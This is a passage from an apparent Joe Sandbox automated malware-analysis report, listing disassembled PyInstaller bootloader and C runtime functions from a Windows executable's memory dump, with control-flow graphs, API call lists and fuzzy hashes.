                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505322733.00007FF79DB14000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505380426.00007FF79DB16000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_15_2_7ff79dad0000_5B34.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Environment$CreateDirectoryExpandMessagePathStringsTempVariable_invalid_parameter_noinfo
                                                                                                                                                                                                                                  • String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
                                                                                                                                                                                                                                  • API String ID: 740614611-1339014028
                                                                                                                                                                                                                                  • Opcode ID: 11860e683bfeec2df00dcc2c56da5dbb6591d5702bb717516bbb2bb41ff9b0e3
                                                                                                                                                                                                                                  • Instruction ID: dcb379cf431c945fc5a664cc387d15bcf67a75ab12e0c844f592bb50c08d0286
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 11860e683bfeec2df00dcc2c56da5dbb6591d5702bb717516bbb2bb41ff9b0e3
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 81419A15A0D64240EA74BB359865AF99251EF89B80FC00032EE8E477D6FE3CED24C760
                                                                                                                                                                                                                                  Function 00007FF79DAEAD6C Relevance: 10.8, APIs: 7, Instructions: 290COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 572 7ff79daead6c-7ff79daead92 573 7ff79daead94-7ff79daeada8 call 7ff79dae43d4 call 7ff79dae43f4 572->573 574 7ff79daeadad-7ff79daeadb1 572->574 588 7ff79daeb19e 573->588 576 7ff79daeb187-7ff79daeb193 call 7ff79dae43d4 call 7ff79dae43f4 574->576 577 7ff79daeadb7-7ff79daeadbe 574->577 595 7ff79daeb199 call 7ff79dae9bf0 576->595 577->576 579 7ff79daeadc4-7ff79daeadf2 577->579 579->576 582 7ff79daeadf8-7ff79daeadff 579->582 585 7ff79daeae01-7ff79daeae13 call 7ff79dae43d4 call 7ff79dae43f4 582->585 586 7ff79daeae18-7ff79daeae1b 582->586 585->595 591 7ff79daeb183-7ff79daeb185 586->591 592 7ff79daeae21-7ff79daeae27 586->592 593 7ff79daeb1a1-7ff79daeb1b8 588->593 591->593 592->591 596 7ff79daeae2d-7ff79daeae30 592->596 595->588 596->585 597 7ff79daeae32-7ff79daeae57 596->597 600 7ff79daeae59-7ff79daeae5b 597->600 601 7ff79daeae8a-7ff79daeae91 597->601 603 7ff79daeae82-7ff79daeae88 600->603 604 7ff79daeae5d-7ff79daeae64 600->604 605 7ff79daeae66-7ff79daeae7d call 7ff79dae43d4 call 7ff79dae43f4 call 7ff79dae9bf0 601->605 606 7ff79daeae93-7ff79daeaebb call 7ff79daec90c call 7ff79dae9c58 * 2 601->606 608 7ff79daeaf08-7ff79daeaf1f 603->608 604->603 604->605 637 7ff79daeb010 605->637 633 7ff79daeaebd-7ff79daeaed3 call 7ff79dae43f4 call 7ff79dae43d4 606->633 634 7ff79daeaed8-7ff79daeaf03 call 7ff79daeb594 606->634 611 7ff79daeaf21-7ff79daeaf29 608->611 612 7ff79daeaf9a-7ff79daeafa4 call 7ff79daf2c2c 608->612 611->612 616 7ff79daeaf2b-7ff79daeaf2d 611->616 624 7ff79daeb02e 612->624 625 7ff79daeafaa-7ff79daeafbf 612->625 616->612 621 7ff79daeaf2f-7ff79daeaf45 616->621 621->612 626 7ff79daeaf47-7ff79daeaf53 621->626 629 7ff79daeb033-7ff79daeb053 ReadFile 624->629 625->624 631 7ff79daeafc1-7ff79daeafd3 GetConsoleMode 625->631 626->612 627 7ff79daeaf55-7ff79daeaf57 626->627 627->612 632 7ff79daeaf59-7ff79daeaf71 627->632 635 7ff79daeb14d-7ff79daeb156 GetLastError 629->635 636 7ff79daeb059-7ff79daeb061 629->636 631->624 638 7ff79daeafd5-7ff79daeafdd 631->638 632->612 640 7ff79daeaf73-7ff79daeaf7f 632->640 633->637 634->608 645 7ff79daeb173-7ff79daeb176 635->645 646 7ff79daeb158-7ff79daeb16e call 7ff79dae43f4 call 7ff79dae43d4 635->646 636->635 642 7ff79daeb067 636->642 639 7ff79daeb013-7ff79daeb01d call 7ff79dae9c58 637->639 638->629 644 7ff79daeafdf-7ff79daeb001 ReadConsoleW 638->644 639->593 640->612 648 7ff79daeaf81-7ff79daeaf83 640->648 652 7ff79daeb06e-7ff79daeb083 642->652 654 7ff79daeb003 GetLastError 644->654 655 7ff79daeb022-7ff79daeb02c 644->655 649 7ff79daeb17c-7ff79daeb17e 645->649 650 7ff79daeb009-7ff79daeb00b call 7ff79dae4368 645->650 646->637 648->612 659 7ff79daeaf85-7ff79daeaf95 648->659 649->639 650->637 652->639 661 7ff79daeb085-7ff79daeb090 652->661 654->650 655->652 659->612 665 7ff79daeb092-7ff79daeb0ab call 7ff79daea984 661->665 666 7ff79daeb0b7-7ff79daeb0bf 661->666 672 7ff79daeb0b0-7ff79daeb0b2 665->672 669 7ff79daeb0c1-7ff79daeb0d3 666->669 670 7ff79daeb13b-7ff79daeb148 call 7ff79daea7c4 666->670 673 7ff79daeb0d5 669->673 674 7ff79daeb12e-7ff79daeb136 669->674 670->672 672->639 675 7ff79daeb0da-7ff79daeb0e1 673->675 674->639 677 7ff79daeb0e3-7ff79daeb0e7 675->677 678 7ff79daeb11d-7ff79daeb128 675->678 679 7ff79daeb103 677->679 680 7ff79daeb0e9-7ff79daeb0f0 677->680 678->674 682 7ff79daeb109-7ff79daeb119 679->682 680->679 681 7ff79daeb0f2-7ff79daeb0f6 680->681 681->679 683 7ff79daeb0f8-7ff79daeb101 681->683 682->675 684 7ff79daeb11b 682->684 683->682 684->674
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000F.00000002.1505257262.00007FF79DAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF79DAD0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505232385.00007FF79DAD0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505290344.00007FF79DAFB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505322733.00007FF79DB0E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505322733.00007FF79DB14000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505380426.00007FF79DB16000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_15_2_7ff79dad0000_5B34.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                                                                                  • Opcode ID: 7e4b6968f21da67f115f2b5899b729ebe27c21aa0167ab1df282e77588440d71
                                                                                                                                                                                                                                  • Instruction ID: aa917b7af4000ee7d16fd589553b766fd174102b9e74497a1d40578a0a9f76e1
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7e4b6968f21da67f115f2b5899b729ebe27c21aa0167ab1df282e77588440d71
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 76C1E122A0C78791E770AB259444ABDBB94EB99B90F954131DACE03791EE7CEC65C330
                                                                                                                                                                                                                                  Function 00007FF79DAD7B50 Relevance: 10.6, APIs: 7, Instructions: 63COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000F.00000002.1505257262.00007FF79DAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF79DAD0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505232385.00007FF79DAD0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505290344.00007FF79DAFB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505322733.00007FF79DB0E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505322733.00007FF79DB14000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505380426.00007FF79DB16000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_15_2_7ff79dad0000_5B34.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 995526605-0
                                                                                                                                                                                                                                  • Opcode ID: 748b97fd960fc4e5004671791fa0bd5d217265360f36ca399a643c65045a3ab9
                                                                                                                                                                                                                                  • Instruction ID: b6f6263c7be20f32ce30479de7ad9bb8c529bb7de2b22423152524b2e2cef089
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 748b97fd960fc4e5004671791fa0bd5d217265360f36ca399a643c65045a3ab9
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B1217525A0CA4241EB30AB79A454A69E7A1EF857A4F900235DAEE43AE4EF7CDC548710
                                                                                                                                                                                                                                  Function 00007FF79DAD33E0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 59COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetModuleFileNameW.KERNEL32(?,00007FF79DAD3534), ref: 00007FF79DAD3411
                                                                                                                                                                                                                                    • Part of subcall function 00007FF79DAD29E0: GetLastError.KERNEL32(?,?,?,00007FF79DAD342E,?,00007FF79DAD3534), ref: 00007FF79DAD2A14
                                                                                                                                                                                                                                    • Part of subcall function 00007FF79DAD29E0: FormatMessageW.KERNEL32(?,?,?,00007FF79DAD342E), ref: 00007FF79DAD2A7D
                                                                                                                                                                                                                                    • Part of subcall function 00007FF79DAD29E0: MessageBoxW.USER32 ref: 00007FF79DAD2ACF
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000F.00000002.1505257262.00007FF79DAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF79DAD0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505232385.00007FF79DAD0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505290344.00007FF79DAFB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505322733.00007FF79DB0E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505322733.00007FF79DB14000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505380426.00007FF79DB16000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_15_2_7ff79dad0000_5B34.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Message$ErrorFileFormatLastModuleName
                                                                                                                                                                                                                                  • String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
                                                                                                                                                                                                                                  • API String ID: 517058245-2863816727
                                                                                                                                                                                                                                  • Opcode ID: 4333ea13b7f7892cb13c7834fe0fbc8b7cb0659b0560af6bfa7ef98de9a8054c
                                                                                                                                                                                                                                  • Instruction ID: 25ab03c9ab614fba4f2117219fb9fb651cf64798fbf85f12bb9a2620c951c8bb
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4333ea13b7f7892cb13c7834fe0fbc8b7cb0659b0560af6bfa7ef98de9a8054c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FE2151A1B1C64291FA31BB35E861BB9E260FF48395FC00136D6DD865E5FE2CE924C724
                                                                                                                                                                                                                                  Function 00007FF79DAD8400 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 64COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00007FF79DAD7B50: GetCurrentProcess.KERNEL32 ref: 00007FF79DAD7B70
                                                                                                                                                                                                                                    • Part of subcall function 00007FF79DAD7B50: OpenProcessToken.ADVAPI32 ref: 00007FF79DAD7B83
                                                                                                                                                                                                                                    • Part of subcall function 00007FF79DAD7B50: GetTokenInformation.KERNELBASE ref: 00007FF79DAD7BA8
                                                                                                                                                                                                                                    • Part of subcall function 00007FF79DAD7B50: GetLastError.KERNEL32 ref: 00007FF79DAD7BB2
                                                                                                                                                                                                                                    • Part of subcall function 00007FF79DAD7B50: GetTokenInformation.KERNELBASE ref: 00007FF79DAD7BF2
                                                                                                                                                                                                                                    • Part of subcall function 00007FF79DAD7B50: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF79DAD7C0E
                                                                                                                                                                                                                                    • Part of subcall function 00007FF79DAD7B50: CloseHandle.KERNEL32 ref: 00007FF79DAD7C26
                                                                                                                                                                                                                                  • LocalFree.KERNEL32(?,00007FF79DAD3814), ref: 00007FF79DAD848C
                                                                                                                                                                                                                                  • LocalFree.KERNEL32(?,00007FF79DAD3814), ref: 00007FF79DAD8495
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000F.00000002.1505257262.00007FF79DAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF79DAD0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505232385.00007FF79DAD0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505290344.00007FF79DAFB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505322733.00007FF79DB0E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505322733.00007FF79DB14000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505380426.00007FF79DB16000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_15_2_7ff79dad0000_5B34.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                                  • String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
                                                                                                                                                                                                                                  • API String ID: 6828938-1529539262
                                                                                                                                                                                                                                  • Opcode ID: 66c7400c0f842d66862a6c7a5c7e226ffa5096460946b14aa4108adf3e2753a4
                                                                                                                                                                                                                                  • Instruction ID: 497f5efaf959ae3070ff39f70b624cabd3e11838c729b402c31311e82cc54254
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 66c7400c0f842d66862a6c7a5c7e226ffa5096460946b14aa4108adf3e2753a4
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 00212161A0C64181FB24BB30E425BE9A2A4FB88780FC44436EACD47796EF3CDD55C7A0
                                                                                                                                                                                                                                  Function 00007FF79DAEC270 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 819 7ff79daec270-7ff79daec295 820 7ff79daec563 819->820 821 7ff79daec29b-7ff79daec29e 819->821 822 7ff79daec565-7ff79daec575 820->822 823 7ff79daec2a0-7ff79daec2d2 call 7ff79dae9b24 821->823 824 7ff79daec2d7-7ff79daec303 821->824 823->822 825 7ff79daec305-7ff79daec30c 824->825 826 7ff79daec30e-7ff79daec314 824->826 825->823 825->826 828 7ff79daec316-7ff79daec31f call 7ff79daeb630 826->828 829 7ff79daec324-7ff79daec339 call 7ff79daf2c2c 826->829 828->829 834 7ff79daec453-7ff79daec45c 829->834 835 7ff79daec33f-7ff79daec348 829->835 836 7ff79daec4b0-7ff79daec4d5 WriteFile 834->836 837 7ff79daec45e-7ff79daec464 834->837 835->834 838 7ff79daec34e-7ff79daec352 835->838 839 7ff79daec4e0 836->839 840 7ff79daec4d7-7ff79daec4dd GetLastError 836->840 841 7ff79daec466-7ff79daec469 837->841 842 7ff79daec49c-7ff79daec4ae call 7ff79daebd28 837->842 843 7ff79daec363-7ff79daec36e 838->843 844 7ff79daec354-7ff79daec35c call 7ff79dae3ae0 838->844 845 7ff79daec4e3 839->845 840->839 846 7ff79daec46b-7ff79daec46e 841->846 847 7ff79daec488-7ff79daec49a call 7ff79daebf48 841->847 862 7ff79daec440-7ff79daec447 842->862 849 7ff79daec37f-7ff79daec394 GetConsoleMode 843->849 850 7ff79daec370-7ff79daec379 843->850 844->843 853 7ff79daec4e8 845->853 854 7ff79daec4f4-7ff79daec4fe 846->854 855 7ff79daec474-7ff79daec486 call 7ff79daebe2c 846->855 847->862 858 7ff79daec44c 849->858 859 7ff79daec39a-7ff79daec3a0 849->859 850->834 850->849 863 7ff79daec4ed 853->863 864 7ff79daec500-7ff79daec505 854->864 865 7ff79daec55c-7ff79daec561 854->865 855->862 858->834 860 7ff79daec3a6-7ff79daec3a9 859->860 861 7ff79daec429-7ff79daec43b call 7ff79daeb8b0 859->861 868 7ff79daec3b4-7ff79daec3c2 860->868 869 7ff79daec3ab-7ff79daec3ae 860->869 861->862 862->853 863->854 871 7ff79daec533-7ff79daec53d 864->871 872 7ff79daec507-7ff79daec50a 864->872 865->822 876 7ff79daec3c4 868->876 877 7ff79daec420-7ff79daec424 868->877 869->863 869->868 874 7ff79daec544-7ff79daec553 871->874 875 7ff79daec53f-7ff79daec542 871->875 878 7ff79daec523-7ff79daec52e call 7ff79dae43b0 872->878 879 7ff79daec50c-7ff79daec51b 872->879 874->865 875->820 875->874 880 7ff79daec3c8-7ff79daec3df call 7ff79daf2cf8 876->880 877->845 878->871 879->878 885 7ff79daec3e1-7ff79daec3ed 880->885 886 7ff79daec417-7ff79daec41d GetLastError 880->886 887 7ff79daec3ef-7ff79daec401 call 7ff79daf2cf8 885->887 888 7ff79daec40c-7ff79daec413 885->888 886->877 887->886 892 7ff79daec403-7ff79daec40a 887->892 888->877 890 7ff79daec415 888->890 890->880 892->888
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF79DAEC25B), ref: 00007FF79DAEC38C
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF79DAEC25B), ref: 00007FF79DAEC417
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000F.00000002.1505257262.00007FF79DAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF79DAD0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505232385.00007FF79DAD0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505290344.00007FF79DAFB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505322733.00007FF79DB0E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505322733.00007FF79DB14000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505380426.00007FF79DB16000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_15_2_7ff79dad0000_5B34.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ConsoleErrorLastMode
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 953036326-0
                                                                                                                                                                                                                                  • Opcode ID: 1f18d30cb6731d2276149ea46625d8d438ffcaf3b5eb5be8e43e25f336112fa7
                                                                                                                                                                                                                                  • Instruction ID: e9144f5b2fe7fb05e90ee079f660b6209630d1068cee35112b2a314f56075e39
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1f18d30cb6731d2276149ea46625d8d438ffcaf3b5eb5be8e43e25f336112fa7
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F191B472A0C65285F770EF799444ABDABA0FB08B88F944135DE8E57A85EE3CD851C730
                                                                                                                                                                                                                                  Function 00007FF79DAE4938 Relevance: 6.1, APIs: 4, Instructions: 90fileCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000F.00000002.1505257262.00007FF79DAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF79DAD0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505232385.00007FF79DAD0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505290344.00007FF79DAFB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505322733.00007FF79DB0E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505322733.00007FF79DB14000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505380426.00007FF79DB16000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_15_2_7ff79dad0000_5B34.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1279662727-0
                                                                                                                                                                                                                                  • Opcode ID: ebea2a15e315379b7438f17c06ac6f564ef77e5ce815d722b4931623952d3bd6
                                                                                                                                                                                                                                  • Instruction ID: 25ba7dd0b1798dfbc0697d5a323842f02db40bb8b8204daa1dba4dc03d2df931
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ebea2a15e315379b7438f17c06ac6f564ef77e5ce815d722b4931623952d3bd6
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 18419322D1C78243E620AB7195107B9A664FB98764F509335D6DC03AE5EFACE9B0C724
                                                                                                                                                                                                                                  Function 00007FF79DADBF5C Relevance: 4.6, APIs: 3, Instructions: 94COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000F.00000002.1505257262.00007FF79DAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF79DAD0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505232385.00007FF79DAD0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505290344.00007FF79DAFB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505322733.00007FF79DB0E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505322733.00007FF79DB14000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505380426.00007FF79DB16000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_15_2_7ff79dad0000_5B34.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3251591375-0
                                                                                                                                                                                                                                  • Opcode ID: 51e2e4cc4e0defacebf1dac919e01b91b6d5e84f1fe25dd37a2b49ce45fe95ab
                                                                                                                                                                                                                                  • Instruction ID: a35aa2aabc252e7df8e0168c1eb5aa8e3a130a4c7d15094eb48ead652fd1ffa5
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 51e2e4cc4e0defacebf1dac919e01b91b6d5e84f1fe25dd37a2b49ce45fe95ab
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EE312A11A0D25341FA74BB78A566BB992A1DF89784FC44035E9CE4B2D7FE2CAC24C371
                                                                                                                                                                                                                                  Function 00007FF79DAE8D48 Relevance: 4.5, APIs: 3, Instructions: 14COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000F.00000002.1505257262.00007FF79DAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF79DAD0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505232385.00007FF79DAD0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505290344.00007FF79DAFB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505322733.00007FF79DB0E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505322733.00007FF79DB14000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505380426.00007FF79DB16000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_15_2_7ff79dad0000_5B34.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1703294689-0
                                                                                                                                                                                                                                  • Opcode ID: 824606f6feba241c18d37bd9947fb033388d99e3127919417550cde66a1966b4
                                                                                                                                                                                                                                  • Instruction ID: 0a088f3b468e4e1f48f4ac04ea8162c756915c84039ff5de50ebc780ae769efb
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 824606f6feba241c18d37bd9947fb033388d99e3127919417550cde66a1966b4
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0CD01710B1C60A82EA343B70688A9B982219F9C710F841578C88A06393EE2DAC288230
                                                                                                                                                                                                                                  Function 00007FF79DADF45C Relevance: 3.2, APIs: 2, Instructions: 177COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000F.00000002.1505257262.00007FF79DAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF79DAD0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505232385.00007FF79DAD0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505290344.00007FF79DAFB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505322733.00007FF79DB0E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505322733.00007FF79DB14000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505380426.00007FF79DB16000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_15_2_7ff79dad0000_5B34.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                  • String ID:
